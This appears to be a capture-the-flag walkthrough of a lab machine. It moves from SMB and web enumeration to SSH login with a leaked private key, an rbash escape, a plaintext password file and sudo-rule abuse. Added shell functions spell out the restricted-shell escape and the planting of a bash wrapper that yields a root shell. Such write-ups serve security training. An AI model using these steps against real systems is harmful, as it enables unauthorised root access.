Starting off on this machine, we find that port 80 is protected by an HTTP basic-auth login.
I decided against brute-forcing it for the moment and moved straight on to the other open ports. Looking at port 445 (SMB), I ran enum4linux against the target and discovered some user accounts.
We have discovered the following users:
With no accessible shares on SMB, we move on to enumerating port 7601, which in the browser shows the following:
dirsearch.py against this port reveals the /keys/ directory.
private and private.bak contain RSA private keys. I copied the key over to my attacking machine, renamed it to id_rsa and used chmod to set the permissions SSH requires (600: ssh refuses a private key that is readable by group or others).
Knowing the three users on the target machine, we can try the key against each of them over SSH. I was able to log in as the user tanto.
Once logged in as tanto we find we are dropped into rbash (restricted bash) and unable to run some commands. I used the following command sequence to first escape rbash, then export a new PATH, and finally upgrade to a proper shell again via Python:
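The exact commands are not reproduced on this page. What follows is an added example, not the author's own sequence, showing what rbash refuses and the three-step escape described above (spawn an unrestricted child shell, export a usable PATH, upgrade to a PTY with python). It assumes bash is installed on the box; `bash -r` is the same thing as `rbash`, so the restricted behaviour can be reproduced locally.

```shell
# Added example (not the write-up's own commands): rbash restrictions and escape.
# Assumes bash is installed; `bash -r` behaves identically to rbash.

# Run one command under restricted bash and print "blocked" if rbash refused it.
# rbash reports "restricted" for cd, slashes in command names and redirections,
# and "readonly variable" for any attempt to change PATH.
rbash_blocks() {
    if bash -r -c "$1" 2>&1 | grep -qE 'restricted|readonly'; then
        echo blocked
    else
        echo allowed
    fi
}

# The escape: the restrictions apply to the restricted shell itself, not to the
# programs it launches. Starting a plain `bash` (no slash in the name, found via
# PATH) from inside rbash gives an unrestricted shell, in which PATH can be
# exported and cd works. Prints the directory the child shell reached.
rbash_escape() {
    bash -r -c 'bash -c "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; cd / && pwd"' 2>&1
}

# Final step from the write-up: upgrade to a full PTY. Interactive use only,
# so it is defined here but not exercised by the offline checks.
upgrade_tty() {
    python3 -c 'import pty; pty.spawn("/bin/bash")'
}
```

If `bash` or `python` is not reachable on the restricted PATH, the same idea still applies through any program that can spawn a shell (for example an editor's `:!bash`), or by avoiding rbash at login with `ssh -t user@host bash --noprofile`.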
Once we can move around the box again, I moved into the seppuku user's home directory. The file .passwd there is of interest and contains the password:
This password did not work for the user seppuku, but I was able to use su with it to log in as the user samurai.
I then transferred linpeas over to the target machine, and it soon picked up this user's sudo permissions.
Open another tab and log in as tanto over SSH again. Then create the directory and file that the sudo rule refers to, so that it can be executed as the user samurai. Once the directory and the bin file have been created, echo a bash shell into the file and chmod it to make it executable.
Then, in our other tab as samurai, execute the file with the following command to gain a root shell:
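The sudo rule's path and the author's exact command are not shown on this page. As an added example (not the write-up's own commands), the planting step above can be scripted so the path named by `sudo -l` is passed in as a parameter; everything about that path is an assumption of the caller, and the directory name used in the check below is made up.

```shell
# Added example (not the write-up's own commands): plant an executable at a
# path that a sudo rule lets another user run, so sudo hands back a root shell.
# The target path is an ASSUMPTION supplied by the caller (whatever `sudo -l`
# reports for samurai on the real box).

# From the tanto session: create the directory and file the sudo rule names,
# put a bash wrapper in it, and make it executable. Prints the path on success.
plant_shell() {
    local target="$1"
    mkdir -p "$(dirname "$target")"
    # The wrapper simply execs bash, forwarding any arguments. Run via sudo,
    # that bash runs as root.
    printf '#!/bin/bash\nexec /bin/bash "$@"\n' > "$target"
    chmod 755 "$target"
    # Sanity check before switching tabs: executable, and the shebang is intact.
    [ -x "$target" ] && head -n1 "$target" | grep -q '^#!/bin/bash$' && printf '%s\n' "$target"
}

# From the samurai session (the other tab): run the planted file through sudo.
# Not exercised offline, since it needs the sudo rule to exist.
pop_root() {
    sudo "$1"
}
```

Check `sudo -l` output carefully before planting: the rule may name a path relative to another user's home or contain `..` components, and the file must sit at exactly the path sudo will resolve, or sudo will refuse to run it.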